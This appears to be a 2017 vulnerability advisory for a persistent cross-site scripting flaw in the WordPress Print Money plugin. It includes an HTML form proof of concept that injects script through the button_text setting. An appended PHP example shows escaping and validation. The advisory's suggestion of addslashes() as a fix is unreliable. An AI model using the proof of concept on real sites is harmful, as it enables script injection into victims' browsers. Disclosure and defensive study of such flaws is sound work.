-----------------------------------------
- Credit : Ashiyane Digital Security Team
- Website : Www.Ashiyane.Org
- Discovered By : ZeroDay
- Release Date : March 13 , 2017
- Level : Low
-----------------------------------------
I.Vulnerability
---------------
WordPress Print Money v4.91 Plugin Persistent Cross Site Scripting
II.Background
-------------
Print Money Is A WordPress Plugin That Adds A Button To Any WordPress Image To Enable Your Visitors To Buy Prints.
III.DESCRIPTION
----------------
A Persistent XSS Vulnerability Has Been Detected In Print Money That Allows
Arbitrary HTML/Script Code To Be Executed In The Context
Of The Victim User's Browser.
IV.PROOF OF CONCEPT EXPLOIT
---------------------------
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=print-money" method="POST">
<input type="hidden" name="button_text" value=""><script>alert("XSS By ZeroDay");</script>" />
<input type="hidden" name="img-print-btn-cats-update" value="Update" />
<input type="hidden" name="button_text_color" value="%23fff" />
<input type="hidden" name="button_bg_color" value="%%23000" />
<input type="hidden" name="position" value="top-left" />
<input type="hidden" name="container" value="entry-content%2Celements-box%2Cthn_post_wrap%2Clist-inline%2Cblog%2Cpost%2Cpost-content%2Centry%2Centry-summary%2Cgroup%2Ccontent%2Ccontent_constrain%2Cpage-content%2Cpage-content%2Crow%2Ctp-single-post%2Cbody%2Cthe-content%2Cwrapper%2Chentry" />
<input type="hidden" name="updateSubmit" value="Update" />
<input type="submit" value="Run Attack !" />
</form>
</body>
</html>
V.SYSTEM AFFECTED
-----------------
Print Money <= 4.91
VI.SOLUTION
-----------
You Can Use A Filter Function Such As htmlspecialchars(), addslashes() Or htmlentities() To Patch This
Vulnerability.
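Added example, not part of the original advisory and not the plugin's own code: a stand-alone PHP sketch of output escaping and input validation for the button_text and colour fields named in the form above. The function names, the attribute-echo pattern, the 60-character limit and the sample values are assumptions made for illustration.

```php
<?php
// Added example: hypothetical handling of the button_text setting, not the plugin's code.

// Assumed vulnerable pattern: the stored value is echoed into an attribute as-is.
function render_unsafe(string $text): string
{
    return '<input type="text" name="button_text" value="' . $text . '" />';
}

// Hardened output: escape <, >, & and both quote styles at the point of output.
function render_safe(string $text): string
{
    $escaped = htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="button_text" value="' . $escaped . '" />';
}

// Input validation as a second layer: plain text only, bounded length.
function clean_button_text($raw): string
{
    $text = is_string($raw) ? $raw : '';
    $text = preg_replace('/[\x00-\x1F\x7F]/', '', $text); // drop control characters
    return substr(trim(strip_tags($text)), 0, 60);         // 60 is an assumed limit
}

// Strict allow-list check for the colour fields (#rgb or #rrggbb).
function clean_hex_color($raw, string $default): string
{
    return (is_string($raw) && preg_match('/^#(?:[0-9a-fA-F]{3}){1,2}$/D', $raw)) ? $raw : $default;
}

// Constructed sample submission, shaped like the form in the advisory.
$post = [
    'button_text'       => '"><script>alert(1)</script>',
    'button_text_color' => '#fff',
    'button_bg_color'   => '%#000',
];

echo "unsafe:     ", render_unsafe($post['button_text']), "\n";
// addslashes() only adds a backslash, which HTML ignores: the quote still closes the attribute.
echo "addslashes: ", render_unsafe(addslashes($post['button_text'])), "\n";
echo "escaped:    ", render_safe($post['button_text']), "\n";
echo "validated:  ", render_safe(clean_button_text($post['button_text'])), "\n";
echo "text color: ", clean_hex_color($post['button_text_color'], '#ffffff'), "\n";
echo "bg color:   ", clean_hex_color($post['button_bg_color'], '#000000'), "\n";
```

Inside WordPress, esc_attr() and sanitize_text_field() do the same jobs as the escaping and cleaning helpers here. A nonce on the settings form, checked with check_admin_referer(), rejects a POST submitted from another site like the one in the proof of concept.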
VII. REFERENCES
-------------------------
https://wordpress.org/plugins/print-money/
VIII. CREDITS
-------------------------
This Vulnerability Has Been Discovered By ZeroDay
IX. ABOUT
-------------------------
ZeroDay
Researcher , Pentester